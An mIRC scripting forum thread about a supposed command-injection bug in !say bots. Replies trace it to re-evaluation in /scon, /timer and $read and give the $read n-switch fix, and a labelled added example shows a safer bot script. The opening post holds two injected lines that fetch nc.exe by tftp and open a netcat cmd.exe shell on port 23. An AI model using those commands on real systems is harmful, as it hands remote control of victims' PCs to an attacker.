#89889 10/07/04 04:45 AM
Joined: Jul 2004
Posts: 12
G
Grumpy Offline OP
Pikka bird
I just found a bug in mIRC on users with !say commands activated.
The bug includes remote execution of commands using $crlf.
For example, if someone has a !say script running:
!say something $crlf join #123
and the script will only say something, then execute the /join command after that.

This could be major if someone doesn't have /run locked.
Someone could get total control of a PC with two lines:
!say test $crlf run tftp -i <ip> get nc.exe
!say test $crlf run nc.exe -l -p 23 -e cmd.exe
Voila! You've got instant access on port 23!
Other bugs include $chr(13).
You can even get the passwords in your client with !say %passwd or something.


Last edited by Grumpy; 10/07/04 04:47 AM.
#89890 10/07/04 05:02 AM
Joined: May 2003
Posts: 730
S
Hoopy frood
Offline
That is not a bug; $crlf specifies the end of a command when the server reads it.
Also, your example with the run won't work because it will send run to the server rather than executing it in mIRC.

#89891 10/07/04 06:01 AM
Joined: Mar 2004
Posts: 457
D
Fjord artisan
Offline
Did a little test...here are the results:

(6:59am) <baddie> !say something $crlf join #123
(6:59am) <averageuser> something $crlf join #123

$crlf is perfectly safe.

Used this script btw:
Code:
on *:text:!say *:#: { 
  msg $chan $2-
}

#89892 10/07/04 02:26 PM
Joined: May 2003
Posts: 730
S
Hoopy frood
Offline
Yes, also it will join the channel only if you evaluate $($1-,2), which is not recommended.

#89893 10/07/04 03:09 PM
Joined: Jul 2003
Posts: 742
Hoopy frood
Offline
You shouldn't store your password anyway.


http://MTec89Net.com
irc.freenode.net #MTec89Net
#89894 10/07/04 03:19 PM
Joined: Jan 2003
Posts: 2,523
Q
Hoopy frood
Offline
There's no bug here. My guess is that you're using /scon (or /scid), probably to relay messages to a channel on another network. Passing $1- to /scon has the side-effects that you mentioned because /scon re-evaluates the parameters passed to it. Use something like
Code:
var %a = $1-
scon N msg #somechannel % $+ a
or
Code:
scon N
msg #somechannel $1-
scon -r
/timer behaves the same way as /scon (re-evaluates the parameters passed to it each time it fires), so you need to watch out for that too.

Last edited by qwerty; 10/07/04 03:21 PM.

/.timerQ 1 0 echo /.timerQ 1 0 $timer(Q).com
#89895 14/07/04 01:24 PM
Joined: Jul 2004
Posts: 12
G
Grumpy Offline OP
Pikka bird
Hey, thanks, I never thought this would get this many replies. Anyway, thanks for all the feedback. I worked it out. Actually I was using $read(filename.txt , %linenumber) because I allow certain users to add descriptions to stuff with my bot and add it to a text file. I used $replace to add a - to words with $ and %. Anyway, to ScatMan: that's exactly what I ended up finding out after playing with it. So I guess it's not that serious. Anyway, thanks for all the feedback again.

#89896 14/07/04 02:44 PM
Joined: Jan 2003
Posts: 2,523
Q
Hoopy frood
Offline
Ah, in the case of $read, you can just use the n switch to avoid re-evaluation of the line contents:
Code:
$read(file.txt,n,%linenumber)
$read(file.txt,N) acts as $eval($read(file.txt,n,N),2).

Btw, $(string,N) (mentioned by ScatMan) and $eval(string,N) are equivalent.

Last edited by qwerty; 14/07/04 02:46 PM.

/.timerQ 1 0 echo /.timerQ 1 0 $timer(Q).com
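
Added example (not part of the thread and not any poster's script): a description bot of the kind Grumpy describes, with the evaluating $read call kept as a comment beside the n-switch form from the post above. The file name descs.txt and the !adddesc / !desc triggers are assumptions made for the illustration.

```mirc
; Added example. descs.txt, !adddesc and !desc are hypothetical names.

; Store a description. Inside the event, $2- is evaluated exactly once,
; so /write receives the user's text as plain characters ("$crlf" stays
; the six characters $ c r l f, as in the test shown earlier in the thread).
on *:text:!adddesc *:#: {
  write descs.txt $2-
  msg $chan Stored as description $lines(descs.txt)
}

; Replay a stored description by line number.
on *:text:!desc *:#: {
  var %n = $lines(descs.txt)

  ; Accept only a line number that exists in the file.
  if (($2 !isnum 1-) || ($2 > %n)) {
    msg $chan No such description (1- $+ %n available)
    return
  }

  ; BEFORE (unsafe): without the n switch the stored line is evaluated,
  ; so identifiers and variables that another user typed are expanded
  ; by the bot when the line is read back.
  ;   msg $chan $read(descs.txt,$2)

  ; AFTER: the n switch returns the line as plain text with no
  ; re-evaluation. The t switch makes $read treat the first line as
  ; text even if it is a number, so a stored "5" is not taken as a
  ; line-count header.
  var %d = $read(descs.txt,nt,$2)

  ; A blank line would leave /msg without text; skip it.
  if (%d == $null) { msg $chan Description $2 is empty | return }

  ; %d is expanded once into text here; its contents are not parsed again.
  msg $chan %d
}
```

With the n switch in place there is no need to strip or rewrite $ and % in stored descriptions; the text is replayed exactly as it was typed.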
#89897 15/07/04 01:05 PM
Joined: Jul 2004
Posts: 12
G
Grumpy Offline OP
Pikka bird
Ah cool, thanks for the info man!!
I have already edited my bot's script, and patched it the hard way, replacing all $'s in the descriptions.
I guess I can put it back on when I finish my bot's next version.

